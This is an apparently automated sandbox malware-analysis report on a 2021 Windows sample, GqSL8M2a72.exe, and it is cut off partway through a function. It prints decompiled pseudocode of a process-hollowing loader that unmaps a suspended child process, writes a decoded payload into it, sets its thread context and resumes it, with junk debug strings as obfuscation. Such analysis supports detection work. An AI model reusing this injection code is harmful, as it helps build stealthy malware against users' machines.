Click to jump to process

System Behavior

Analysis Process: GqSL8M2a72.exe PID: 1832 Parent PID: 5716

General

Start time:	15:03:53
Start date:	21/02/2021
Path:	C:\Users\user\Desktop\GqSL8M2a72.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\GqSL8M2a72.exe'
Imagebase:	0x400000
File size:	161962 bytes
MD5 hash:	4FC29198FCC9A9FE3B31F7549D54D8E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: GqSL8M2a72.exe PID: 5864 Parent PID: 1832

General

Start time:	15:03:54
Start date:	21/02/2021
Path:	C:\Users\user\Desktop\GqSL8M2a72.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\GqSL8M2a72.exe'
Imagebase:	0x400000
File size:	161962 bytes
MD5 hash:	4FC29198FCC9A9FE3B31F7549D54D8E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: GqSL8M2a72.exe PID: 1832 Parent PID: 5716 GqSL8M2a72.exeCOMMON

Executed Functions

Function 0042694B, Relevance: 33.5, APIs: 9, Strings: 10, Instructions: 289
nativeprocessthreadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042694B(void* __edx) {
				WCHAR* _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				long _v28;
				struct _PROCESS_INFORMATION _v44;
				long _v48;
				void _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				struct _STARTUPINFOW _v136;
				long _v140;
				intOrPtr _v692;
				struct _CONTEXT _v856;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t92;
				void* _t94;
				void* _t96;
				WCHAR* _t98;
				int _t105;
				intOrPtr _t109;
				void* _t110;
				intOrPtr _t115;
				WCHAR* _t117;
				signed char _t119;
				long _t122;
				void* _t125;
				intOrPtr _t126;
				long _t132;
				intOrPtr _t135;
				long _t139;
				long _t144;
				void* _t145;
				intOrPtr _t147;
				void* _t156;
				long _t157;
				long _t162;
				void* _t171;
				signed int _t181;
				void* _t185;
				void* _t188;
				intOrPtr _t208;
				intOrPtr _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t215;

				_t193 = __edx;
				_t92 =  *0x42a524;
				_t212 = _t211 - 0x354;
				if(_t92 != 0) {
					 *((intOrPtr*)( *0x4294ec + 0x20)) = _t92;
				}
				E0040101D("asdxgbn");
				_t94 =  *0x4282a0; // 0x5e0000
				_v856 = 0x10007;
				_v20 = _t94;
				if( *0x4294ec != 0) {
					_v136.cb = 0x44;
				}
				_v136.cbReserved2 = 0;
				_v136.dwFillAttribute = 0;
				_v136.dwFlags = 0;
				_v136.dwX = 0;
				_v136.dwXCountChars = 0;
				_v136.dwXSize = 0;
				_v136.dwYCountChars = 0;
				_v136.dwY = 0;
				_v136.dwYSize = 0;
				_v136.hStdError = 0;
				_v136.hStdInput = 0;
				_v136.hStdOutput = 0;
				_v12 = 0;
				_v136.lpDesktop = 0;
				_v136.lpReserved = 0;
				_v136.lpReserved2 = 0;
				_v136.lpTitle = 0;
				_v136.wShowWindow = 0;
				_t96 = E00401032("CreateProcessW"); // executed
				_t98 = E004011B6(0, 0, _t193, _t96);
				_push(0x7c99b767);
				_v8 = _t98;
				E0040101D("utanwvwedwitpi%X"); // executed
				if(CreateProcessW(0, 0x4292b0, 0, 0, 0, 4, 0, 0,  &_v136,  &_v44) == 0) {
					_push(0x7c99b767);
					E0040101D("utanwvwedwitpi%X");
					goto L26;
				} else {
					NtGetContextThread(_v44.hThread,  &_v856); // executed
					E0040101D("asdxgbn");
					_t109 =  *0x428284; // 0x401748
					_t29 = _t109 + 0xd; // 0x400000
					 *0x428294 =  *_t29;
					_t30 = _t109 + 0xd; // 0x400000
					_t110 =  *_t30;
					_v16 = _v692;
					_v24 = _t110;
					NtUnmapViewOfSection(_v44.hProcess, _t110); // executed
					 *0x428290 = _v44.hProcess;
					while(1) {
						_t181 =  *0x428278; // 0xf808ba61
						_t115 =  *0x428284; // 0x401748
						_t40 = _t115 + 0x11; // 0x27000
						 *0x428298 = _t181 * ( *( *0x4294ec + 2) & 0x000000ff) +  *_t40;
						_t117 = E0042656B(0x428290);
						_v8 = _t117;
						if(_t117 >= 0) {
							break;
						}
						_push(0x7c99b767);
						_push(0x7c99b767);
						_push(0x7c99b767);
						E0040101D("qjqrpyiwswriwrivlchdktbnooowoh%X%d%x");
						_t119 = "juuwxho"; // 0x6a
						_t212 = _t212 + 0x10;
						__eflags = _v12 - (_t119 & 0x000000ff);
						if(_v12 >= (_t119 & 0x000000ff)) {
							_t122 = E0042656B(0x428290);
							_v8 = _t122;
							__eflags = _t122;
							if(__eflags < 0) {
								_push(0x7c99b767);
								_push(0x7c99b767);
								E0040101D("eawxwtivhfieihxvuudg%d0%X");
								_t212 = _t212 + 0xc;
								 *0x428294 = 0;
								_v8 = E0042656B(0x428290);
							}
							L10:
							SetUnhandledExceptionFilter(E00401234); // executed
							if(_v8 >= 0) {
								E0040101D("utanwvwedwitpi%X");
								_t125 =  *0x428294; // 0x400000
								_t185 = 0x7c99b767;
								_v52 = _t125;
								_t126 = E004263D9(0, _t185, _t193, __eflags);
								_push(0x7c99b767);
								 *0x42a504 = _t126; // executed
								E0040101D("utanwvwedwitpi%X"); // executed
								_t132 = NtWriteVirtualMemory(_v44.hProcess, _v16 + 8,  &_v52, 4,  &_v28); // executed
								__eflags = _t132;
								if(_t132 < 0) {
									goto L11;
								}
								_v60 =  *0x42a520;
								_v68 =  *0x42a528;
								_t135 =  *0x4282a0; // 0x5e0000
								_push(0x7c99b767);
								_v64 = _t135;
								_push(0x7c99b767);
								_v56 =  *0x42a51c;
								E0040101D("eawxwtivhfieihxvuudg%d0%X"); // executed
								_push(0x7c99b767);
								E0040101D("utanwvwedwitpi%X"); // executed
								_t213 = _t212 + 0x14;
								_t139 = E004268FF( &_v68); // executed
								__eflags = _t139;
								if(_t139 == 0) {
									E0040101D("asdxgbn");
									goto L11;
								}
								_push(0x7c99b767);
								E0040101D("utanwvwedwitpi%X"); // executed
								_t208 =  *((intOrPtr*)(_v20 + 0x3c)) + _v20;
								_push(0x7c99b767);
								_v16 = _t208;
								E0040101D("utanwvwedwitpi%X"); // executed
								_t214 = _t213 + 0x10;
								_t144 = NtWriteVirtualMemory(_v44.hProcess,  *0x428294, _v20,  *(_t208 + 0x54),  &_v28); // executed
								__eflags = _t144;
								if(_t144 >= 0) {
									_t145 = E00401032("ZwProtectVirtualMemory"); // executed
									_t147 = E004011B6(1, 0, _t193, _t145);
									_push(0x7c99b767);
									_push(0x7c99b767);
									 *0x4282ac = _t147; // executed
									E0040101D("eawxwtivhfieihxvuudg%d0%X"); // executed
									_t210 = _v16;
									_t215 = _t214 + 0xc;
									_v8 = 0;
									__eflags = 0 -  *(_t210 + 6);
									if(0 >=  *(_t210 + 6)) {
										L25:
										E0042658E(_t193,  *0x428294, _t210,  &_v44,  &_v856); // executed
										L26:
										ExitProcess(0x7c99b767); // executed
									}
									_v12 = 0;
									do {
										_t188 = _v20;
										_t171 =  *((intOrPtr*)(_t188 + 0x3c)) + _v12 + _t188 + 0xf8;
										_t156 =  *((intOrPtr*)(_t171 + 0xc)) +  *0x428294;
										_v24 = _t156;
										_v48 =  *((intOrPtr*)(_t171 + 8));
										_t193 =  *((intOrPtr*)(_t171 + 0x14)) + _t188;
										_t157 = NtWriteVirtualMemory(_v44.hProcess, _t156,  *((intOrPtr*)(_t171 + 0x14)) + _t188,  *(_t171 + 0x10),  &_v28); // executed
										__eflags = _t157;
										if(_t157 < 0) {
											goto L24;
										}
										_t162 = NtProtectVirtualMemory(_v44,  &_v24,  &_v48, E00426CDE( *((intOrPtr*)(_t171 + 0x24))),  &_v140); // executed
										__eflags = _t162;
										if(_t162 < 0) {
											goto L25;
										}
										_push(0x7c99b767);
										_push(0x7c99b767);
										_push(0x7c99b767);
										E0040101D("qjqrpyiwswriwrivlchdktbnooowoh%X%d%x"); // executed
										_t215 = _t215 + 0x10;
										L24:
										_v8 =  &(_v8[0]);
										_v12 = _v12 + 0x28;
										__eflags = _v8 - ( *(_t210 + 6) & 0x0000ffff);
									} while (_v8 < ( *(_t210 + 6) & 0x0000ffff));
									goto L25;
								}
								_t105 = 0x7c99b767;
								L12:
								return _t105;
							}
							L11:
							_t105 = 0;
							goto L12;
						}
						_t37 =  &_v12;
						 *_t37 = _v12 + 1;
						__eflags =  *_t37;
					}
					E0040101D("asdxgbn"); // executed
					goto L10;
				}
			}

0x0042694b
0x0042694e
0x00426953
0x00426960
0x00426968
0x00426968
0x00426970
0x00426975
0x0042697b
0x00426985
0x0042698e
0x00426990
0x00426990
0x004269a1
0x004269a5
0x004269a8
0x004269ab
0x004269ae
0x004269b1
0x004269b4
0x004269b7
0x004269ba
0x004269bd
0x004269c0
0x004269c3
0x004269c6
0x004269c9
0x004269cc
0x004269cf
0x004269d2
0x004269d5
0x004269d9
0x004269e1
0x004269eb
0x004269f2
0x004269f5
0x00426a19
0x00426cd3
0x00426cd5
0x00000000
0x00426a1f
0x00426a29
0x00426a34
0x00426a39
0x00426a3f
0x00426a42
0x00426a48
0x00426a48
0x00426a55
0x00426a58
0x00426a5b
0x00426a64
0x00426a90
0x00426a99
0x00426aa2
0x00426aa7
0x00426aac
0x00426ab2
0x00426ab7
0x00426abc
0x00000000
0x00000000
0x00426a70
0x00426a71
0x00426a72
0x00426a78
0x00426a7d
0x00426a85
0x00426a88
0x00426a8b
0x00426ae2
0x00426ae7
0x00426aea
0x00426aec
0x00426aee
0x00426aef
0x00426af5
0x00426afa
0x00426aff
0x00426b0a
0x00426b0a
0x00426ac9
0x00426ace
0x00426ad7
0x00426b16
0x00426b1b
0x00426b21
0x00426b22
0x00426b25
0x00426b2a
0x00426b2c
0x00426b31
0x00426b4c
0x00426b52
0x00426b54
0x00000000
0x00000000
0x00426b5b
0x00426b63
0x00426b66
0x00426b6b
0x00426b6c
0x00426b74
0x00426b7a
0x00426b7d
0x00426b82
0x00426b84
0x00426b89
0x00426b8f
0x00426b94
0x00426b96
0x00426cc8
0x00000000
0x00426ccd
0x00426b9c
0x00426ba2
0x00426bad
0x00426baf
0x00426bb5
0x00426bb8
0x00426bbd
0x00426bd3
0x00426bd9
0x00426bdb
0x00426be9
0x00426bf1
0x00426bf6
0x00426bf7
0x00426bfd
0x00426c02
0x00426c07
0x00426c0c
0x00426c0f
0x00426c12
0x00426c16
0x00426ca5
0x00426cb7
0x00426cbc
0x00426cbd
0x00426cbd
0x00426c1c
0x00426c1f
0x00426c1f
0x00426c28
0x00426c32
0x00426c38
0x00426c3e
0x00426c4b
0x00426c52
0x00426c58
0x00426c5a
0x00000000
0x00000000
0x00426c77
0x00426c7d
0x00426c7f
0x00000000
0x00000000
0x00426c81
0x00426c82
0x00426c83
0x00426c89
0x00426c8e
0x00426c91
0x00426c95
0x00426c98
0x00426c9c
0x00426c9c
0x00000000
0x00426c1f
0x00426bdd
0x00426adb
0x00426adf
0x00426adf
0x00426ad9
0x00426ad9
0x00000000
0x00426ad9
0x00426a8d
0x00426a8d
0x00426a8d
0x00426a8d
0x00426ac3
0x00000000
0x00426ac8

APIs

CreateProcessW.KERNELBASE(00000000,004292B0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,asdxgbn,FlushInstructionCache,utanwvwedwitpi%X), ref: 00426A14
NtGetContextThread.NTDLL(?,00010007), ref: 00426A29
NtUnmapViewOfSection.NTDLL(?,00400000), ref: 00426A5B
SetUnhandledExceptionFilter.KERNELBASE(Function_00001234), ref: 00426ACE

Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027

NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 00426B4C
NtWriteVirtualMemory.NTDLL(?,?,?,?), ref: 00426BD3
NtWriteVirtualMemory.NTDLL(?,?,?,?,?,?,?,00000000), ref: 00426C52
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,?), ref: 00426C77
ExitProcess.KERNEL32 ref: 00426CBD

Strings

juuwxho, xrefs: 00426A7D
D, xrefs: 00426990
CreateProcessW, xrefs: 0042699C
asdxgbn, xrefs: 0042695D, 0042696B, 00426A2F, 00426ABE, 00426CC3
utanwvwedwitpi%X, xrefs: 00426959, 004269EC, 004269F1, 00426B10, 00426B15, 00426B2B, 00426B83, 00426B9D, 00426BB0, 00426CD4
qjqrpyiwswriwrivlchdktbnooowoh%X%d%x, xrefs: 00426A73, 00426C84
ZwProtectVirtualMemory, xrefs: 00426BE4
eawxwtivhfieihxvuudg%d0%X, xrefs: 00426AF0, 00426B75, 00426BF8
(, xrefs: 00426C98
FlushInstructionCache, xrefs: 0042695C

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: MemoryVirtual$Write$Process$ContextCreateDebugExceptionExitFilterOutputProtectSectionStringThreadUnhandledUnmapView
String ID: ($CreateProcessW$D$FlushInstructionCache$ZwProtectVirtualMemory$asdxgbn$eawxwtivhfieihxvuudg%d0%X$juuwxho$qjqrpyiwswriwrivlchdktbnooowoh%X%d%x$utanwvwedwitpi%X
API String ID: 1800598123-2899511959
Opcode ID: cc89499e51efe65e3e7433f20a06dac176252773f30c3b572d2b680b834a2253
Instruction ID: 0089f9647ac6b02fc778d6c97e1f63c2d5a1d0ea3fadbc31d8d4f7d017f031d0
Opcode Fuzzy Hash: cc89499e51efe65e3e7433f20a06dac176252773f30c3b572d2b680b834a2253
Instruction Fuzzy Hash: F5B15E71E01268EFCB10DF95EC859AEBBB8FF48304B9440BEE504E7251DA389945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004015DA, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 100
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004015DA(void* __ebx, void* __edi) {
				void* __esi;
				void* _t12;
				void* _t14;
				signed int _t18;
				signed int _t23;
				intOrPtr _t28;
				void* _t30;
				void* _t34;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t40;
				signed short* _t42;
				signed short* _t43;
				signed int* _t48;
				signed int* _t49;
				void* _t50;
				void* _t55;
				void* _t57;

				_t50 = __edi;
				_t40 = __ebx;
				E0040101D("asdxgbn"); // executed
				_t12 = HeapCreate(0, 0x16fcd8, 0); // executed
				 *0x42a4f4 = _t12;
				if(_t12 != 0) {
					L2:
					_t14 =  *(E00401016() + 0x30);
					 *0x4294ec = _t14;
					if(_t14 == 0) {
						goto L4;
					} else {
						_t42 =  *( *((intOrPtr*)( *0x4294ec + 0x10)) + 0x44);
						_push(_t50);
						_t48 = 0x4292b0;
						do {
							_t18 =  *_t42 & 0x0000ffff;
							 *_t48 = _t18;
							_t42 =  &(_t42[1]);
							_t48 =  &(_t48[0]);
						} while (_t18 != 0);
						_push(0x3e872ca4);
						_push(0x3e872ca4);
						E0040101D("eawxwtivhfieihxvuudg%d0%X"); // executed
						E0040101D("utanwvwedwitpi%X"); // executed
						_t43 =  *( *((intOrPtr*)( *0x4294ec + 0x10)) + 0x44);
						_t49 = 0x4292b0;
						_t55 = 0x3e872ca4;
						do {
							_t23 =  *_t43 & 0x0000ffff;
							 *_t49 = _t23;
							_t43 =  &(_t43[1]);
							_t49 =  &(_t49[0]);
						} while (_t23 != 0);
						 *0x428284 = 0x401748;
						E0040101D("asdxgbn"); // executed
						_t28 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *0x4294ec + 0xc)) + 0xc))));
						 *0x428288 = _t28;
						 *0x42a500 = _t28;
						 *0x42a518 =  *((intOrPtr*)(_t28 + 0x18)); // executed
						_t30 = E00401032("NtAllocateVirtualMemory"); // executed
						 *0x42a4f0 = E004011B6(1, _t40, _t49, _t30);
						_t57 = _t55;
						_push(_t57);
						E0040101D("asdxgbn"); // executed
						_t34 = E00401032("ZwUnmapViewOfSection"); // executed
						_t36 = E004011B6(1, _t40, _t49, _t34);
						 *0x428000 =  *0x428000 | 0x00002000;
						 *0x42829c = _t36;
						_t37 =  *0x428288; // 0x682e70
						_t38 =  *_t37;
						 *0x428288 = _t38;
						 *0x42a500 = _t38;
						_t39 =  *((intOrPtr*)(_t38 + 0x18));
						 *0x42a530 =  *( *0x4294ec + 2) & 0x000000ff;
						 *0x42a510 = _t39;
						return _t39;
					}
				} else {
					_t14 = GetProcessHeap();
					 *0x42a4f4 = _t14;
					if(_t14 == 0) {
						L4:
						return _t14;
					} else {
						goto L2;
					}
				}
			}

0x004015da
0x004015da
0x004015df
0x004015ee
0x004015f4
0x004015fb
0x0040160c
0x00401611
0x00401614
0x0040161b
0x00000000
0x0040161d
0x00401630
0x00401634
0x0040163a
0x0040163c
0x0040163c
0x0040163f
0x00401642
0x00401645
0x00401648
0x00401652
0x00401653
0x00401659
0x00401664
0x00401671
0x00401677
0x0040167a
0x0040167b
0x0040167b
0x0040167e
0x00401681
0x00401684
0x00401687
0x0040168c
0x004016a1
0x004016b1
0x004016b3
0x004016b8
0x004016c6
0x004016cb
0x004016d8
0x004016dd
0x004016e3
0x004016e9
0x004016f4
0x004016fc
0x0040170b
0x00401715
0x0040171a
0x0040171f
0x00401721
0x00401726
0x0040172b
0x0040172e
0x00401734
0x0040173a
0x0040173a
0x004015fd
0x004015fd
0x00401603
0x0040160a
0x00401627
0x00401627
0x00000000
0x00000000
0x00000000
0x0040160a

APIs

Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027

HeapCreate.KERNELBASE(00000000,0016FCD8,00000000,00401586), ref: 004015EE
GetProcessHeap.KERNEL32 ref: 004015FD

Strings

asdxgbn, xrefs: 004015DA, 0040169C, 004016E4
ZwUnmapViewOfSection, xrefs: 004016EF
p.h, xrefs: 004016B3, 0040171A, 00401721
utanwvwedwitpi%X, xrefs: 0040165F
NtAllocateVirtualMemory, xrefs: 004016C1
eawxwtivhfieihxvuudg%d0%X, xrefs: 00401654

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: Heap$CreateDebugOutputProcessString
String ID: NtAllocateVirtualMemory$ZwUnmapViewOfSection$asdxgbn$eawxwtivhfieihxvuudg%d0%X$p.h$utanwvwedwitpi%X
API String ID: 2742831793-2131156820
Opcode ID: 38c67a580e8236ede4afe964cbec2e317ea3fea706778b025de380d8fb144f04
Instruction ID: e5516d2686025df9b216e2e8a5d8cb179dec33a435564fb0075ebe591fadafa5
Opcode Fuzzy Hash: 38c67a580e8236ede4afe964cbec2e317ea3fea706778b025de380d8fb144f04
Instruction Fuzzy Hash: 1C316B74B052118FC324EF69EC45E563BA4BB5831479440BBE904DB3B1EB799842CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0042658E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0042658E(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CONTEXT* _a16) {
				void* __ebx;
				void* __esi;
				signed char _t9;
				signed char _t10;
				void* _t13;
				long _t17;
				void* _t22;
				signed char _t26;
				signed char _t27;
				CONTEXT* _t30;
				intOrPtr* _t31;
				signed char _t34;
				signed char _t40;
				void* _t43;
				void* _t45;
				intOrPtr* _t47;

				_t43 = __edx;
				_t30 = _a16;
				_t44 = "asdxgbn";
				E0040101D("asdxgbn");
				_t9 = "uuwxho"; // 0x75
				_t10 =  *0x428273; // 0x77
				_t34 = "juuwxho"; // 0x6a
				_t45 = 0;
				if(_t34 * _t10 * _t9 > 0) {
					do {
						_t45 = _t45 + 1;
						 *((intOrPtr*)(_t30 + 0xb0)) =  *((intOrPtr*)(_a8 + 0x28)) + _a4;
						_t26 = "uuwxho"; // 0x75
						_t27 =  *0x428273; // 0x77
						_t40 = "juuwxho"; // 0x6a
					} while (_t45 < _t40 * _t27 * _t26);
				}
				_t13 = E00401032("NtResumeProcess"); // executed
				_t47 = E004011B6(1, _t30, _t43, _t13); // executed
				E0040101D(_t44); // executed
				_t31 = _a12;
				_t17 = NtSetContextThread( *(_t31 + 4), _t30); // executed
				if(_t17 >= 0) {
					E0040101D(_t44); // executed
					E0040101D(_t44); // executed
					E0040101D(_t44); // executed
					 *_t47( *_t31); // executed
					_t22 = E0040101D(_t44); // executed
					return _t22;
				}
				return _t17;
			}

0x0042658e
0x00426592
0x00426597
0x0042659d
0x004265a2
0x004265ab
0x004265b6
0x004265c2
0x004265c6
0x004265c8
0x004265d1
0x004265d2
0x004265d8
0x004265e0
0x004265eb
0x004265f7
0x004265c8
0x00426600
0x0042660e
0x00426610
0x00426617
0x0042661d
0x00426625
0x00426628
0x0042662e
0x00426634
0x0042663e
0x00426641
0x00000000
0x00426646
0x0042664b

APIs

Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027

NtSetContextThread.NTDLL(?,?,00000000), ref: 0042661D
NtResumeProcess.NTDLL(?), ref: 0042663E

Strings

juuwxho, xrefs: 004265B6, 004265EB
asdxgbn, xrefs: 00426597, 0042659C, 0042660D, 00426627, 0042662D, 00426633, 00426640
NtResumeProcess, xrefs: 004265FB

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: ContextDebugOutputProcessResumeStringThread
String ID: NtResumeProcess$asdxgbn$juuwxho
API String ID: 3632123085-45952772
Opcode ID: 26bfeced9572530dcff3606bb280507cbf6910dbb8f2d8ab2111e9b1d87a4cf6
Instruction ID: f22c4f2b92b37300b29d808eac3de40bbc1a686723c17df8826b547dfebf2ca7
Opcode Fuzzy Hash: 26bfeced9572530dcff3606bb280507cbf6910dbb8f2d8ab2111e9b1d87a4cf6
Instruction Fuzzy Hash: BC11CB316044A0ABC719AF76ACD587F7FEC5A4531578401BFF884E7663CA2C84469B7C

Uniqueness

Uniqueness Score: -1.00%

Function 00401145, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00401145(char* _a4, DWORD* _a8) {
				DWORD* _t9;
				BYTE* _t12;

				_t9 = _a8;
				_push(0xd768074e);
				_t13 = "utanwvwedwitpi%X";
				E0040101D("utanwvwedwitpi%X"); // executed
				_push(0xd768074e);
				E0040101D(_t13); // executed
				_t12 = HeapAlloc( *0x42a4f4, 8, 0x24c7d);
				if(_t12 == 0) {
					L2:
					E0040101D("asdxgbn");
					 *_t9 =  *_t9 & 0x00000000;
				} else {
					 *_t9 = 0x24c7d;
					if(CryptStringToBinaryA(_a4, 0x24c7c, 1, _t12, _t9, 0, 0) == 0) {
						goto L2;
					}
				}
				return _t12;
			}

0x00401149
0x00401153
0x00401154
0x0040115a
0x0040115f
0x00401161
0x0040117d
0x00401181
0x0040119f
0x004011a4
0x004011a9
0x00401183
0x00401193
0x0040119d
0x00000000
0x00000000
0x0040119d
0x004011b3

APIs

Part of subcall function 0040101D: OutputDebugStringA.KERNELBASE(?), ref: 00401027

HeapAlloc.KERNEL32(00000008,00024C7D,00000000,00000000), ref: 00401177
CryptStringToBinaryA.CRYPT32(?,00024C7C,00000001,00000000,00000000,00000000,00000000), ref: 00401195

Strings

asdxgbn, xrefs: 00401148, 0040119F
utanwvwedwitpi%X, xrefs: 0040114C, 00401154, 00401159, 00401160

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: String$AllocBinaryCryptDebugHeapOutput
String ID: asdxgbn$utanwvwedwitpi%X
API String ID: 5594083-2624427986
Opcode ID: 124f3ed19d6bfd8ff75f73c34bf11eaf1128148241b054baf25a356a7057a415
Instruction ID: 3715dd168f9bf6af97242894a17cbed62ab9b8c26c736d1d6d2338c9c26910e2
Opcode Fuzzy Hash: 124f3ed19d6bfd8ff75f73c34bf11eaf1128148241b054baf25a356a7057a415
Instruction Fuzzy Hash: F1F0C83274162077D7312A56AC49F47BA5DEF85B64F500036F608B62D1C678584546AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401326, Relevance: 1.5, APIs: 1, Instructions: 18
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401326(void* __ecx) {
				long _v8;
				long _t8;

				_v8 = ( *( *0x4294ec + 2) & 0x000000ff) +  *0x42a520;
				_t8 = NtAllocateVirtualMemory(0xffffffff, 0x4282a0, 0,  &_v8, 0x1000, 4); // executed
				return _t8 + 0x32f7e435;
			}

0x00401340
0x00401350
0x0040135c

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,004282A0,00000000,?,00001000,00000004,AE044E5E,?,004013E3,00000000,00000000), ref: 00401350

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 42dc475ab22a10b81b0128247cc73673f273297e82ad081592f32b14b4415b22
Instruction ID: 8007aae11479214b708dad8ec5964b5ec7822f547f31ca7e65a847bcc3a7f65d
Opcode Fuzzy Hash: 42dc475ab22a10b81b0128247cc73673f273297e82ad081592f32b14b4415b22
Instruction Fuzzy Hash: 39E0C271304244BBC710CB48DD03F5677A8AB08758F940267B610E61D1D5B4EA11875C

Uniqueness

Uniqueness Score: -1.00%

Function 0042656B, Relevance: 1.5, APIs: 1, Instructions: 12
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042656B(void** __eax) {
				long _t5;

				_t4 = __eax;
				_t1 =  &(_t4[2]); // 0x428298
				_t3 =  &(_t4[1]); // 0x428294
				_t5 = NtAllocateVirtualMemory( *__eax, _t3,  *( *0x4294ec + 2) & 0x000000ff, _t1, 0x3000, 0x40); // executed
				return _t5;
			}

0x0042656b
0x00426572
0x00426581
0x00426587
0x0042658d

APIs

NtAllocateVirtualMemory.NTDLL(00428290,00428294,?,00428298,00003000,00000040,00426AB7), ref: 00426587

Memory Dump Source

Source File: 00000001.00000002.196926157.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.196922569.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196944770.0000000000427000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.196948050.0000000000428000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 76538b6c075140c6cdd3edadd7b181ea52f6a16d1a8d24a34b10e5025c22849e
Instruction ID: fa7fdad05dd5aacf96cb1dbd0332fc11f6bee89d6edaba40021a428d7adb533e
Opcode Fuzzy Hash: 76538b6c075140c6cdd3edadd7b181ea52f6a16d1a8d24a34b10e5025c22849e
Instruction Fuzzy Hash: 93D023711100006FCB1DC700CC6DF617F68A744300F04408DB3064B0F1DA70B505CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040135D, Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 168
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040135D(void* __edx, void* __eflags) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v96;
				char _v608;
				void* __ebx;
				void* __esi;
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t24;
				intOrPtr _t27;
				void* _t30;
				void* _t31;
				char* _t37;
				char* _t42;
				void* _t48;
				struct HWND__* _t55;
				struct HWND__* _t57;
				void* _t64;
				void* _t68;
				WCHAR* _t72;
				struct HWND__* _t73;
				intOrPtr* _t74;

				_t68 = __edx;
				_t16 =  *0x428284; // 0x401748
				_t1 = _t16 + 1; // 0x24c91
				_t60 = "asdxgbn";
				_v8 = 0;
				 *0x4282a8 =  *_t1; // executed
				E0040101D("asdxgbn");
				_t19 =  *0x428284; // 0x401748
				_t3 = _t19 + 5; // 0x1b71b
				 *0x42a520 =  *_t3; // executed
				E0040101D("asdxgbn");
				_t22 =  *0x428284; // 0x401748
				_t4 = _t22 + 9; // 0x22a00
				 *0x42a51c =  *_t4; // executed
				_t24 = E00401032("RegisterClassExA"); // executed
				 *0x42828c = E004011B6(3, _t60, _t68, _t24);
				_t27 =  *0x428284; // 0x401748
				_t5 = _t27 + 9; // 0x22a00
